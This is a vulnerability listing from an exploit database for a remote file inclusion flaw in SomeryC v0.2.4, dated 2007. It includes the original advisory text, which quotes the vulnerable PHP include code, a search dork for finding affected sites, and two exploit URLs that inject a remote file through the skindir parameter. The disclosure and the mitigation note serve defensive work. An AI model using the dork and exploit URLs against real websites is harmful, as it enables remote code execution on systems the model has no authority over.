header-logo
Suggest Exploit
vendor:
SomeryC
by:
Katatafish
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: SomeryC
Affected Version From: SomeryC v0.2.4
Affected Version To: SomeryC v0.2.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SomeryC <= v0.2.4 Remote File Include

The vulnerability allows an attacker to include remote files in the application, potentially allowing them to execute arbitrary code.

Mitigation:

Patch the application to fix the vulnerability and ensure that user input is properly sanitized before including files.
Source

Exploit-DB raw data:

### SomeryC <= v0.2.4 Remote File Include ###

#Vendor:        http://someryc.mostpopularcomic.com
#download       http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish (karatatata@hush.com)

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
       include("$skindir/header.php");
}
....
       include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]

# milw0rm.com [2007-08-27]

Navigation

Suggest Exploit

Services By CQR